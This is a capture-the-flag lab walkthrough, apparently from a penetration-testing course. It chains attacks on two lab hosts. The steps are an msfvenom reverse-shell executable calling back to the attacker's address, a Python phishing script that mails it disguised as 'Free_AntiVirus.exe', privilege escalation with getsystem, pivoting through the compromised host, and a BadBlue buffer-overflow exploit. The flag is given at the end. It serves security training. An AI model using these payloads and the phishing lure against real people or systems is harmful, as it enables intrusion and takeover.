Client-Side Exploitation

In this lab, you will learn to scan the target machine to discover services and perform phishing attacks to gain access to the system.

Lab Environment

In this lab environment, the user will access a Kali GUI instance. A vulnerable instance can be accessed using the tools installed on Kali on http://demo.ine.local and http://demo1.ine.local

Target Email Address: [email protected]

Objective: Exploit both the target and find the flag!

Tools

The best tools for this lab are:

Nmap
Metasploit Framework
Python

Tasks are meant for educational purposes and to show you the usage of different tools and different methods to achieve the same goal.

Please go ahead ONLY if you have COMPLETED the lab or you are stuck! Checking the solutions before actually trying the concepts and techniques you studied in the course will dramatically reduce the benefits of a hands-on lab!

Solution

Step 1: Open the lab link to access the Kali GUI instance.

Content Image

Step 2: Check if the provided machine/domain is reachable.

Commands

ping demo.ine.local
ping demo1.ine.local

Content Image

Only one provided machine is reachable, i.e., demo.ine.local, and we also found the target's IP addresses.

Step 3: Check open ports on the demo.ine.local machine.

Command

nmap demo.ine.local

Content Image

Multiple ports are open on the demo.ine.local machine.

We can launch attacks on exposed ports. Also, many exciting ports are open on the target machine, i.e., ports 25, 135, and 445, etc. But first, let's check what is running on port 25. Port 25 is the default port for SMTP service.

Step 4: Running the Nmap on port 25 to find all possible information about the target server.

Command

nmap -sV -p 25 demo.ine.local

-sV: Probe open ports to determine service/version info.

-p: Port

Content Image

Target is running the hMailServer on port 25. Now, we know the email server. We also know the target email address.

We could send a malicious attachment to the target user, expecting him to run the email attachment.

An estimated 97% of employees in a wide array of industries are unable to recognize a sophisticated phishing email. So what are they most likely to do when they receive a phishing message? Many times, they're likely to do something dangerous. In , researchers concluded that 86% of organizations had at least one employee try to connect to a phishing site in 2020. That's an enormous risk for a business of any size. Likelihood of Dangerous Employee Email & Phishing Behaviors

1 in 3 employees are likely to click the links in phishing emails.
1 in 8 employees are likely to share information requested in a phishing email.
60% of employees opened emails they weren't fully confident were safe
45% click emails they consider to be suspicious "just in case it's important."
45% of employees never report suspicious messages to IT for review.
41% of employees failed to notice a phishing message because they were tired.
47% of workers cited distraction as the main factor in their failure to spot phishing attempts.

Source: https://www.idagent.com/blog/what-is-your-phishing-risk

In conclusion, statistics show that social engineering is an effective method of initial compromise, as users are innately fallible. You should always be cognizant of the fact that people are prone to making mistakes which could consequently provide you with an important piece of information or a needed shell.

Let's target [email protected] user and send him a malicious executable, and then we will wait for the reverse shell connection.

Step 5: Let's generate malicious windows executable file.

First, check the attacker's machine IP address.

Commands

ip addr
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.15.4 LPORT=4444 -f exe > backdoor.exe
file backdoor.exe

We can run the msfvenom --help command to get all help options.

-p windows/meterpreter/reverse_tcp The reverse TCP windows payload name.

LHOST=10.10.15.4 Attacker Machine IP Address

LPORT=4444 Reverse Port Number

-f exe Output format

Content Image

We have the malicious executable. Now, we need to send the executable to the [email protected] We are sending malicious attachments using the python smtplib library.

Step 6: We need to start msfconsole to receive a meterpreter session. Let's run the Metasploit multi-handler on port 4444.

Commands

msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.15.4
set LPORT 4444
exploit

Content Image

Step 7: Now, let's use python and send the malicious email to the [email protected].

Code

import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
fromaddr = "[email protected]"
toaddr = "[email protected]"  
# instance of MIMEMultipart
msg = MIMEMultipart()
# storing the senders email address  
msg['From'] = fromaddr
# storing the receivers email address 
msg['To'] = toaddr
# storing the subject 
msg['Subject'] = "Subject of the Mail"
# string to store the body of the mail
body = "Body_of_the_mail"
# attach the body with the msg instance
msg.attach(MIMEText(body, 'plain'))
# open the file to be sent 
filename = "Free_AntiVirus.exe"
attachment = open("/root/backdoor.exe", "rb")
# instance of MIMEBase and named as p
p = MIMEBase('application', 'octet-stream')
# To change the payload into encoded form
p.set_payload((attachment).read())
# encode into base64
encoders.encode_base64(p)
p.add_header('Content-Disposition', "attachment; filename= %s" % filename)
# attach the instance 'p' to instance 'msg'
msg.attach(p)
# creates SMTP session
s = smtplib.SMTP('demo.ine.local', 25)
# Converts the Multipart msg into a string
text = msg.as_string()
# sending the mail
s.sendmail(fromaddr, toaddr, text)
# terminating the session
s.quit()

Source: https://www.geeksforgeeks.org/send-mail-attachment-gmail-account-using-python/

We can save the above code in a .py file (send_email.py) and execute the file.

Command

nano send_email.py
<Paste Code>
python3 send_email.py

Content Image

Once we send a malicious attachment to the user, we should expect a meterpreter session on the Metasploit multi-handler.

Content Image

We have successfully gained access to the target orgonization.

Step 8: Now, we will discover target machine information, e.g., current user, system information, arch, etc.

Commands

sysinfo
getuid

Content Image

We are running as an INE\administrator user.

Step 9: We can obtain "SYSTEM" (or "NT AUTHORITY\SYSTEM") privileges on the machine

Commands

getsystem
getuid

Content Image

The getsystem is a meterpreter command for privilege escalation. It uses pre-defined methods to gain the highest privilege (i.e., SYSTEM) on the compromised machine.

0 : All techniques available

1 : Named Pipe Impersonation (In Memory/Admin)

2 : Named Pipe Impersonation (Dropper/Admin)

3 : Token Duplication (In Memory/Admin)

4 : Named Pipe Impersonation (RPCSS variant)

We can notice that the Named Pipe Impersonation technique is used to gain the SYSTEM privileges.

We have successfully exploited the first target and have full access to the machine. Depending on the attacker's objective, we can modify/change the target machine.

Step 10: Let's check if we can access demo1.ine.local from the compromised host.

Before, ping to the second target machine from the compromised host. We need to know the IP address for the demo1.ine.local host.

Remember, when we did ping to both the targets and discovered IP addresses of these target machines:

1. demo.ine.local: 10.0.25.229

2. demo1.ine.local : 10.0.17.12

Now, let's ping to the 10.0.17.12 and verify that it is reachable from the second machine.

Commands

shell
ping 10.0.17.12

Content Image

As we can see, we can access the demo1.ine.local machine, i.e., 10.0.17.12.

However, we cannot access that machine (10.0.17.12) from the Kali machine. So, here we need to perform pivoting by adding route from the Metasploit framework.

Step 11: Let's add the route using the meterpreter session and identify the second machine service.

Commands

CTRL + C
y
run autoroute -s 10.0.17.12/20

Content Image

We have successfully added the route to access the demo1.ine.local machine.

Step 12: Now, we need to identify the running service and open ports on the pivot machine (demo1.ine.local).

First start the socks4a server using the Metasploit module. We will use proxychains for port scanning.

Socks4a Proxy Server

This module provides a socks4a proxy server with built-in Metasploit routing to relay connections. Source:: https://www.rapid7.com/db/modules/auxiliary/server/socks4a/

Note: The proxychains should have configured with the following parameters (at the end of /etc/proxychains4.conf):

Command

cat /etc/proxychains4.conf

Content Image

We can notice, socks4 port is 9050.

Now, let's run the Metasploit socks proxy auxiliary server module on port 9050.

Commands

background
use auxiliary/server/socks_proxy
show options

Content Image

We notice that SRVPORT is 1080, and VERSION is 5 mentioned in the module options. But, we need to set the port to 9050 and the version to 4a. Let's change both the values then run the server.

Commands:

set SRVPORT 9050
set VERSION 4a 
exploit
jobs

Content Image

We can notice that the server is running perfectly.

Step 13: Now, let's run nmap with proxychains to identify all open ports on the pivot machine, i.e. demo1.ine.local

Command:

proxychains nmap demo1.ine.local -sT -Pn -p 1-100

demo1.ine.local: The pivot machine

-sT : TCP connect scan

-Pn : Skip host discovery and force port scan.

-p 1-100 : Define port range to scan

This scan is the safest way to identify the open ports. We could use an auxiliary TCP port scanning module. But those are very aggressive and can kill your session.

Content Image

One port is open on the target machine, i.e., 80. We can forward the port to find the running application name and version. However, looking at them, we can easily guess that port 80 is for Httpd service. Let's forward the port and check the running application.

Step 14: We are forwarding port 80 to the attacker machine's port 1234

Commands

sessions -i 1
portfwd add -l 1234 -p 80 -r 10.0.17.12
portfwd list

Content Image

We have successfully forwarded port 80 to local port 1234. Let's run nmap and identify the application name and version.

Command

nmap -sV -p 1234 localhost

Content Image

The target is running BadBlue httpd 2.7 on port 80. The BadBlue is a file-sharing server.

Now, we have discovered a running application name and version. Let's find if it is vulnerable to any known public exploits.

Step 15: We will search for the public exploit of the badblue 2.7 application using searchsploit.

Command

searchsploit badblue 2.7

About "searchsploit"

searchsploit is a bash script that helps find exploits for services, OSes, and applications.

Content Image

We have received an output stating that the badblue 2.7 server is vulnerable to a PassThru buffer overflow.

Step 16: We will background the current meterpreter session and find the badblue exploit module.

Commands

bg
search badblue

Content Image

There is a Metasploit exploit module available for the badblue 2.7 version.

We have successfully identified the running application and discovered the vulnerability of the badblue server. Also, found the exploit module.

Step 17: We will use the badblue exploit module and check all the available options.

Commands

use exploit/windows/http/badblue_passthru
show options

Content Image

We need to set "RHOSTS" (A target Machine Address: IP or URL). In this case, it is demo1.ine.local where the badblue application is running.

Port 80 is by-default mentioned in the module, also windows/meterpreter/reverse_tcp payload is set along with "LHOST" and "LPORT" (Local Machine IP Address and Port) for reverse connection of the meterpreter shell.

The demo1.ine.local machine is not accessible from the Kali machine, so we can't use the reverse_tcp payload. This is an essential step for us to choose the correct payload. In this case, we have to use the bind_tcp payload to gain the meterpreter session.

If we choose the reverse_tcp then the exploit would work but wont gives us a meterpreter session.

Note: Always make sure about LHOST and LPORT values if they don't match your lab setup. And make sure to change if required.

Step 18: Now, set the target information, i.e., set RHOSTS and set PAYLOAD, then exploit the badblue application

Commands

set RHOSTS demo1.ine.local
set PAYLOAD windows/meterpreter/bind_tcp
exploit
getuid
sysinfo

Content Image

We have successfully exploited the badblue server using the Metasploit framework received a meterpreter session with administrator user privileges, i.e., ATTACKDEFENSE\Administrator.

Step 19: Reading the flag.

Commands:

shell
dir C:\
type C:\FLAG1.txt

Content Image

We have found the flag: 0903a189cbe112bce4b75bbc7c50357c

PreviousWindows: File Smuggling with HTML and JavaScript NextEstablishing A Shell Through the Victim's Browser

Last updated 11 months ago